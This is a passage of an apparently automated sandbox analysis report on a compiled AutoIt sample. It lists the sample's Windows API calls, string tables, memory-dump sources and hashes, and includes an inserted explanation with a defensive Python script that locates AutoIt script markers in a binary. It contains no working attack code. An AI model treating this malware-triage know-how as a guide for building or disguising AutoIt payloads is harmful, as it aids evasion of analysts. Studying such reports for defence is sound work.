                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00585029
                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00585034
                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0058503F
                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0058504A
                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00585055
                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00585060
                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0058506B
                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00585076
                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00585081
                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0058508C
                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00585097
                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 005850A2
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 005850AD
                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 005850B8
                                                                      • GetCursorInfo.USER32(?), ref: 005850C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$Load$Info
                                                                      • String ID:
                                                                      • API String ID: 2577412497-0
                                                                      • Opcode ID: 518b3aa61c5bdfc03e9113e449fce5d5ade81b04bf24836a68bd6f9c79d526f7
                                                                      • Instruction ID: dd97a70a2f5e78c303319281e45bd0cb44a1510b0d526974459624b2eef2e04d
                                                                      • Opcode Fuzzy Hash: 518b3aa61c5bdfc03e9113e449fce5d5ade81b04bf24836a68bd6f9c79d526f7
                                                                      • Instruction Fuzzy Hash: 8431E3B1D4831AAADF109FB68C8999EBFE8FB04750F50452AA54DE7280EA786504CF91
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0059A259
                                                                      • DestroyWindow.USER32(?,?), ref: 0059A2D3
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0059A34D
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0059A36F
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A382
                                                                      • DestroyWindow.USER32(00000000), ref: 0059A3A4
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 0059A3DB
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A3F4
                                                                      • GetDesktopWindow.USER32 ref: 0059A40D
                                                                      • GetWindowRect.USER32(00000000), ref: 0059A414
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0059A42C
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0059A444
                                                                        • Part of subcall function 005125DB: GetWindowLongW.USER32(?,000000EB), ref: 005125EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 1297703922-3619404913
                                                                      • Opcode ID: bf95cd0605e43e3feb03239ce7541005c4db5cfdf7a4f5163f8d38a8cecf863b
                                                                      • Instruction ID: bc77667799eebb1e26df5cf7512541f799b4e885ffeb9f06e0206307b6c450a2
                                                                      • Opcode Fuzzy Hash: bf95cd0605e43e3feb03239ce7541005c4db5cfdf7a4f5163f8d38a8cecf863b
                                                                      • Instruction Fuzzy Hash: 1F71A071140305AFDB21CF28CC49F6A7BE5FB99304F14491EF985872A0E774E946DBA2
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00594424
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0059446F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharMessageSendUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 3974292440-4258414348
                                                                      • Opcode ID: 54cadd1a24a8429eac934845efeb79c67c2f8bc969ed944cc4dd9323997f2f26
                                                                      • Instruction ID: edc337f52e0651e434939a7cbc327ddee889068c5cd47935dbbaaff54b86a5b3
                                                                      • Opcode Fuzzy Hash: 54cadd1a24a8429eac934845efeb79c67c2f8bc969ed944cc4dd9323997f2f26
                                                                      • Instruction Fuzzy Hash: FA913A712047029FDB04EF10C469EAEBBE5BF95354F05486CE8965B3A2CB31ED4ACB81
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0059B8B4
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005991C2), ref: 0059B910
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059B949
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0059B98C
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059B9C3
                                                                      • FreeLibrary.KERNEL32(?), ref: 0059B9CF
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0059B9DF
                                                                      • DestroyIcon.USER32(?,?,?,?,?,005991C2), ref: 0059B9EE
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0059BA0B
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0059BA17
                                                                        • Part of subcall function 00532EFD: __wcsicmp_l.LIBCMT ref: 00532F86
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 1212759294-1154884017
                                                                      • Opcode ID: 948ea41afa0bcc47adfeb1cf7ef2603c0b0763a70833ed60dc7bf0b185b2c5b4
                                                                      • Instruction ID: 69f0cbb4031652faad9e60497f5c557c61e0e629bb037748bc6c517749933707
                                                                      • Opcode Fuzzy Hash: 948ea41afa0bcc47adfeb1cf7ef2603c0b0763a70833ed60dc7bf0b185b2c5b4
                                                                      • Instruction Fuzzy Hash: 5061CC71900619BAFF14DF64ED46FBA7BACFB08710F10451AF915D61C0DB74AA90EBA0
                                                                      APIs
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0057A3CB
                                                                      • GetDriveTypeW.KERNEL32 ref: 0057A418
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A460
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A497
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A4C5
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 2698844021-4113822522
                                                                      • Opcode ID: e0fbbabe24122806fd2d5c97fb7051c219cb2c5c85e1f9404ad607eda5f2b24f
                                                                      • Instruction ID: b6119af63d8d7923cd9ae6dd71a91bfbdf13c6b3a4122903d655682d54738b66
                                                                      • Opcode Fuzzy Hash: e0fbbabe24122806fd2d5c97fb7051c219cb2c5c85e1f9404ad607eda5f2b24f
                                                                      • Instruction Fuzzy Hash: 57513C711083059FD700EF14D895DAABBF4FF98718F00886DF89A97251DB31AD4ACB92
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0054E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0056F8DF
                                                                      • LoadStringW.USER32(00000000,?,0054E029,00000001), ref: 0056F8E8
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0054E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0056F90A
                                                                      • LoadStringW.USER32(00000000,?,0054E029,00000001), ref: 0056F90D
                                                                      • __swprintf.LIBCMT ref: 0056F95D
                                                                      • __swprintf.LIBCMT ref: 0056F96E
                                                                      • _wprintf.LIBCMT ref: 0056FA17
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0056FA2E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 984253442-2268648507
                                                                      • Opcode ID: f315c85511125b9f9790bbbde92770009b6f8ddcccbd01c677984b8446124965
                                                                      • Instruction ID: bb11ce4871bc8481fd325a6c866675722639e85d1688062ddca3e8db5f075afc
                                                                      • Opcode Fuzzy Hash: f315c85511125b9f9790bbbde92770009b6f8ddcccbd01c677984b8446124965
                                                                      • Instruction Fuzzy Hash: 36412E7280450EAADB14FBE4DD4AEEE7B78BF98300F500465B505B6092EB356F89CB61
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00599207,?,?), ref: 0059BA56
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BA6D
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BA78
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BA85
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0059BA8E
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BA9D
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0059BAA6
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BAAD
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BABE
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,005A2CAC,?), ref: 0059BAD7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0059BAE7
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0059BB0B
                                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0059BB36
                                                                      • DeleteObject.GDI32(00000000), ref: 0059BB5E
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0059BB74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: 586c1460530d5f36718f445e5e8093483c330284c9dd7a1a9f76431402162a65
                                                                      • Instruction ID: 899bb938051299424d2bd95031c0b2d3bfaecff49873aad863949ce3707e73c9
                                                                      • Opcode Fuzzy Hash: 586c1460530d5f36718f445e5e8093483c330284c9dd7a1a9f76431402162a65
                                                                      • Instruction Fuzzy Hash: 05414A75600208FFEB119F65ED88EAA7BB9FF99711F114069F909D7260C7309D05EB60
                                                                      APIs
                                                                      • __wsplitpath.LIBCMT ref: 0057DA10
                                                                      • _wcscat.LIBCMT ref: 0057DA28
                                                                      • _wcscat.LIBCMT ref: 0057DA3A
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0057DA4F
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0057DA63
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0057DA7B
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0057DA95
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0057DAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                      • String ID: *.*
                                                                      • API String ID: 34673085-438819550
                                                                      • Opcode ID: 8ac94ed717582354484d454796d89fbf1655b739d3be7543d97b6f2ba0759b8d
                                                                      • Instruction ID: 79381ede0874d7a26b484fcf2bd2703a7a0af387397444353dae1f0c62040b0f
                                                                      • Opcode Fuzzy Hash: 8ac94ed717582354484d454796d89fbf1655b739d3be7543d97b6f2ba0759b8d
                                                                      • Instruction Fuzzy Hash: 298171715042459FCB64DF64D844AAABBF4BFC9310F188C2EF98DC7251E630E945DB62
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0059C1FC
                                                                      • GetFocus.USER32 ref: 0059C20C
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0059C217
                                                                      • _memset.LIBCMT ref: 0059C342
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0059C36D
                                                                      • GetMenuItemCount.USER32(?), ref: 0059C38D
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0059C3A0
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0059C3D4
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0059C41C
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0059C454
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0059C489
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1296962147-4108050209
                                                                      • Opcode ID: 0f00014ee431e09da4f469990c597df3ad9c8069defbdb740c560eafbf43d904
                                                                      • Instruction ID: 2085b0304cf86c4a2e404b678498ae91eb420c45e83de2c77d5e882b85f14b2f
                                                                      • Opcode Fuzzy Hash: 0f00014ee431e09da4f469990c597df3ad9c8069defbdb740c560eafbf43d904
                                                                      • Instruction Fuzzy Hash: 50817D70208301AFDF20DF14D994A6BBFE8FB88715F10492EF99997291D770D905DBA2
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 0058738F
                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0058739B
                                                                      • CreateCompatibleDC.GDI32(?), ref: 005873A7
                                                                      • SelectObject.GDI32(00000000,?), ref: 005873B4
                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00587408
                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00587444
                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00587468
                                                                      • SelectObject.GDI32(00000006,?), ref: 00587470
                                                                      • DeleteObject.GDI32(?), ref: 00587479
                                                                      • DeleteDC.GDI32(00000006), ref: 00587480
                                                                      • ReleaseDC.USER32(00000000,?), ref: 0058748B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 3f80f03520268f45f408e27d8424c637f2a95c749092b7df27417dca40588194
                                                                      • Instruction ID: af91123086544ff0d7d74280c35bc2f732c5804008f53e9c3d6617cf3fc3765e
                                                                      • Opcode Fuzzy Hash: 3f80f03520268f45f408e27d8424c637f2a95c749092b7df27417dca40588194
                                                                      • Instruction Fuzzy Hash: CB512975904309AFCB14DFA8CC89EAEBBB9FF48310F14842AE95AA7211C731A9449B50
                                                                      APIs
                                                                        • Part of subcall function 00530957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00516B0C,?,00008000), ref: 00530973
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00516BAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00516CFA
                                                                        • Part of subcall function 0051586D: _wcscpy.LIBCMT ref: 005158A5
                                                                        • Part of subcall function 0053363D: _iswctype.LIBCMT ref: 00533645
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 537147316-1018226102
                                                                      • Opcode ID: 2a14d87a1b35edd6f60855355d54c2846f6a8361a54a3ab951af14ddc2ded64e
                                                                      • Instruction ID: 3f9ffe54714c65e3e0b38f16301f6b6bd35dd3305396848dfcfe8e41bd8c692f
                                                                      • Opcode Fuzzy Hash: 2a14d87a1b35edd6f60855355d54c2846f6a8361a54a3ab951af14ddc2ded64e
                                                                      • Instruction Fuzzy Hash: BF0278301083429FD714EF24D895AAEBFE5BFD8318F14491DF49A972A1DB30D989CB52
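The string IDs of the function above ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<" and the "#include depth exceeded" / "Bad directive syntax error" messages) are the AutoIt v3 runtime's own script-loader constants, which is why the sample is flagged as a compiled AutoIt script. A practitioner triaging such a sample wants two things: confirmation that these tokens are only the interpreter's reference strings (they sit in the code section mapped at 00510000 here), and the location of the actual embedded script payload, which in compiled AutoIt binaries is a separate blob that begins with a 16-byte magic header followed by "AU3!EA06". The following Python is an added example, not code from the Joe Sandbox report or from AutoIt; it scans any raw byte blob (a PE file or one of the .sdmp memory dumps listed above) and separates "runtime strings only" from "embedded script present". The 16-byte magic value is an assumption taken from public AutoIt unpacking tools, not from this report, and the sample inputs are constructed.

```python
# Added example (not part of the Joe Sandbox report or the AutoIt runtime):
# locate compiled-AutoIt script markers in a raw byte blob such as a PE file
# or a memory dump, and tell runtime reference strings apart from a payload.
from __future__ import annotations

# Tokens that appear in this report's string table for the AutoIt runtime.
AU3_TOKENS = {
    "AU3!": b"AU3!",
    "EA06": b"EA06",
    ">>>AUTOIT SCRIPT<<<": b">>>AUTOIT SCRIPT<<<",
}
# 16-byte header that precedes "AU3!EA06" at the start of the embedded script.
# Assumption: value taken from public AutoIt unpackers, not from this report.
AU3_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")
AU3_SCRIPT_HEADER = AU3_MAGIC + b"AU3!EA06"


def find_all(data: bytes, needle: bytes) -> list[int]:
    """Return every offset at which needle occurs in data (overlaps allowed)."""
    offsets: list[int] = []
    start = 0
    while True:
        idx = data.find(needle, start)
        if idx < 0:
            return offsets
        offsets.append(idx)
        start = idx + 1


def scan_au3_markers(data: bytes) -> dict[str, list[int]]:
    """Map each marker name to the offsets where it occurs in data.

    The runtime tokens are reported under their string value; the full
    script header (magic + "AU3!EA06") is reported as "script_header".
    """
    markers = dict(AU3_TOKENS)
    markers["script_header"] = AU3_SCRIPT_HEADER
    found: dict[str, list[int]] = {}
    for name, needle in markers.items():
        hits = find_all(data, needle)
        if hits:
            found[name] = hits
    return found


def classify(data: bytes) -> str:
    """Summarise what the blob contains.

    "embedded_script": the script header is present, so a payload can be
        carved (hand the offset to an AutoIt decompiler).
    "runtime_strings_only": only the interpreter's reference strings were
        found, e.g. in a dump of the runtime's code section as in this report.
    "none": nothing AutoIt-related was found.
    """
    hits = scan_au3_markers(data)
    if "script_header" in hits:
        return "embedded_script"
    if hits:
        return "runtime_strings_only"
    return "none"


# Constructed sample inputs (not real dumps): a runtime-only blob, and the
# same blob followed by a fake script payload carrying the full header.
RUNTIME_ONLY = (
    b"\x00" * 32 + b"AU3!" + b"\x00" * 8 + b"EA06"
    + b">>>AUTOIT SCRIPT<<<" + b"\x00" * 32
)
WITH_SCRIPT = RUNTIME_ONLY + AU3_SCRIPT_HEADER + b"\x01\x02\x03\x04" * 8


if __name__ == "__main__":
    import sys

    # Usage: python au3scan.py <file-or-dump>; with no argument, use the sample.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else WITH_SCRIPT
    print(classify(blob))
    for name, offsets in scan_au3_markers(blob).items():
        print(f"  {name!r}: {[hex(o) for o in offsets]}")
```

Running this over the 00510000-based dump from this report is expected to yield "runtime_strings_only", because that dump is the interpreter's code; the script payload, if it is still present in the process, lives in a different region (in the on-disk binary it is a resource), and the "script_header" offset is the value to give an AutoIt decompiler.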
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00572D50
                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00572DDD
                                                                      • GetMenuItemCount.USER32(005D5890), ref: 00572E66
